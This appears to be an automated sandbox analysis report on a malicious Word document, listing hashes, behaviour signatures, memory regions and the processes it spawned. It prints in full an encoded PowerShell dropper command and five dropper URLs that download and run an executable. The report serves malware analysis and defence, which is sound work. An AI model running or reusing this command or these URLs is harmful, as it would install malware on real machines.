Analysis

  • max time kernel
    118s
  • max time network
    118s
  • platform
    windows7_x64
  • resource
    win7-20231129-en
  • resource tags

    arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system
  • submitted
    10/06/2024, 04:41

General

  • Target

    9a61b87e8fa59338d740809f69c9e4f5_JaffaCakes118.doc

  • Size

    303KB

  • MD5

    9a61b87e8fa59338d740809f69c9e4f5

  • SHA1

    a0986a11d09564898e5901ea1c9dbde2d1c18efd

  • SHA256

    94eb055dd2c9d3e339e4c12764b8f7242d4a1fe33a08e7f7820ade8c357faf93

  • SHA512

    c68a90c1282bf6093310d10631cc632cfeee765ee3a6d19bc8ec3c62b172c0c071a3ab554a12fc2d058d472d24bd9eb00eb35f7d7e9f2e5175a7986bfb292a73

  • SSDEEP

    3072:4Nuje9H1visYgKUonh55BNDlqFfBC8QluuuJSeCCheHP91sjEwc9KJfeWZiH:CJ1DYgKvn75LY6c7EeCChevXlwc9Ky

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://idjvn.com/VFRvAVWyF8

exe.dropper

http://constructiondistrict.com/zA0jHm2vt

exe.dropper

http://www.bspartage.com/MofXXfVq

exe.dropper

http://adam-ch.com/OMKLfD9mZC

exe.dropper

http://galeriakolash.com.ve/RlGVXxAvx

Signatures

  • Blocklisted process makes network request 2 IoCs
  • Drops file in System32 directory 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\9a61b87e8fa59338d740809f69c9e4f5_JaffaCakes118.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:624
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:1880
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -e JABHADAAXwA4AF8AMwA9ACgAJwBsAF8ANQAnACsAJwBfADcANwA2ACcAKQA7ACQAUAAwAF8ANgA1ADAAXwA5AD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAEQAXwA3ADMAMQA1AD0AKAAnAGgAdAB0AHAAOgAnACsAJwAvAC8AaQBkAGoAdgBuAC4AJwArACcAYwAnACsAJwBvAG0AJwArACcALwBWAEYAJwArACcAUgB2ACcAKwAnAEEAVgBXACcAKwAnAHkAJwArACcARgA4ACcAKwAnAEAAJwArACcAaAB0ACcAKwAnAHQAcAA6AC8ALwBjAG8AbgBzAHQAcgB1AGMAdABpAG8AbgAnACsAJwBkAGkAJwArACcAcwB0AHIAaQBjAHQAJwArACcALgAnACsAJwBjAG8AJwArACcAbQAvAHoAQQAwAGoASABtADIAdgAnACsAJwB0AEAAaAAnACsAJwB0ACcAKwAnAHQAJwArACcAcAA6AC8ALwB3AHcAJwArACcAdwAuACcAKwAnAGIAJwArACcAcwBwAGEAJwArACcAcgB0AGEAZwBlAC4AYwBvACcAKwAnAG0ALwBNACcAKwAnAG8AZgBYAFgAZgAnACsAJwBWAHEAJwArACcAQABoAHQAdABwADoALwAnACsAJwAvAGEAZABhAG0ALQAnACsAJwBjAGgAJwArACcALgBjAG8AbQAvAE8AJwArACcATQBLAEwAJwArACcAZgBEADkAJwArACcAbQBaAEMAQABoACcAKwAnAHQAdABwACcAKwAnADoALwAvAGcAYQAnACsAJwBsAGUAcgAnACsAJwBpAGEAJwArACcAawBvAGwAYQBzAGgALgBjACcAKwAnAG8AJwArACcAbQAuAHYAZQAvACcAKwAnAFIAbAAnACsAJwBHACcAKwAnAFYAJwArACcAWAB4AEEAdgAnACsAJwB4ACcAKQAuAFMAcABsAGkAdAAoACcAQAAnACkAOwAkAFAANgBfADgAXwAwAD0AKAAnAG0AMgAnACsAJwBfADIAJwArACcAMQA0ADEAJwApADsAJABLAF8AXwA3AF8AOAAgAD0AIAAnADQAMgAnADsAJABTAF8AMQA5ADEAXwA9ACgAJwBLAF8AMQAnACsAJwBfAF8ANQA2ACcAKQA7ACQAYgA5ADMANAAwADQAMgAxAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABLAF8AXwA3AF8AOAArACgAJwAuAGUAeAAnACsAJwBlACcAKQA7AGYAbwByAGUAYQBjAGgAKAAkAGQAMQA5ADgAMwA2ACAAaQBuACAAJABEAF8ANwAzADEANQApAHsAdAByAHkAewAkAFAAMABfADYANQAwAF8AOQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJABkADEAOQA4ADMANgAsACAAJABiADkAMwA0ADAANAAyADEAKQA7ACQASQA4ADAANQBfADUAMgA9ACgAJwBjACcAKwAnADYAMAAwADQAMAAnACkAOwBJAGYAIAAoACgARwBlAHQALQBJAHQAZQBtACAAJABiADkAMwA0ADAANAAyADEAKQAuAGwAZQBuAGcAdABoACAALQBnAGUAIAA0ADAAMAAwADAAKQAgAHsASQBuAHYAbwBrAGUALQBJAHQAZQBtACAAJABiADkAMwA0ADAANAAyADEAOwAkAEMAOAAzADAANQAzAD0AKAAnAGEAJwArACcAXwA1ACcAKwAnAF8ANQA4ACcAKQA7AGIAcgBlAGEAawA7AH0AfQBjAGEAdABjAGgAewB9AH0AJABuAF8AOAA1AF8ANgAwAF8APQAoACcATgBfAF8AOAA3ADYANQAnACsAJwA4ACcAKQA7AA==
      1⤵
      • Blocklisted process makes network request
      • Drops file in System32 directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1928

    Network

          MITRE ATT&CK Enterprise v15

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

            Filesize

            20KB

            MD5

            a8b514559afd8fba77b2cbd070dc8614

            SHA1

            b36c2f629f47a44ad25379197fde874e1c2b3f83

            SHA256

            f223f434791c0e37d57b003075894715ef86ae18e6452c78eddc62c7df4168e5

            SHA512

            2feeb8dfb708e85c646c0b77c15f311cf38de97a053e87f965505effe84315f6411281180617999bff3f26723b92c62ed8d60d1deecca7b3001b25aaf5ff49bf

          • memory/624-50-0x0000000004F60000-0x0000000005060000-memory.dmp

            Filesize

            1024KB

          • memory/624-139-0x0000000004F60000-0x0000000005060000-memory.dmp

            Filesize

            1024KB

          • memory/624-21-0x0000000004F60000-0x0000000005060000-memory.dmp

            Filesize

            1024KB

          • memory/624-125-0x0000000004F60000-0x0000000005060000-memory.dmp

            Filesize

            1024KB

          • memory/624-113-0x0000000004F60000-0x0000000005060000-memory.dmp

            Filesize

            1024KB

          • memory/624-92-0x0000000004F60000-0x0000000005060000-memory.dmp

            Filesize

            1024KB

          • memory/624-71-0x0000000004F60000-0x0000000005060000-memory.dmp

            Filesize

            1024KB

          • memory/624-0-0x000000002F5C1000-0x000000002F5C2000-memory.dmp

            Filesize

            4KB

          • memory/624-2-0x0000000070EAD000-0x0000000070EB8000-memory.dmp

            Filesize

            44KB

          • memory/624-162-0x0000000070EAD000-0x0000000070EB8000-memory.dmp

            Filesize

            44KB

          • memory/624-124-0x0000000004F60000-0x0000000005060000-memory.dmp

            Filesize

            1024KB

          • memory/624-161-0x000000005FFF0000-0x0000000060000000-memory.dmp

            Filesize

            64KB

          • memory/624-138-0x0000000070EAD000-0x0000000070EB8000-memory.dmp

            Filesize

            44KB

          • memory/624-39-0x0000000004F60000-0x0000000005060000-memory.dmp

            Filesize

            1024KB

          • memory/624-140-0x0000000004F60000-0x0000000005060000-memory.dmp

            Filesize

            1024KB

          • memory/624-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

            Filesize

            64KB

          • memory/1928-131-0x000000001B680000-0x000000001B962000-memory.dmp

            Filesize

            2.9MB

          • memory/1928-132-0x0000000002960000-0x0000000002968000-memory.dmp

            Filesize

            32KB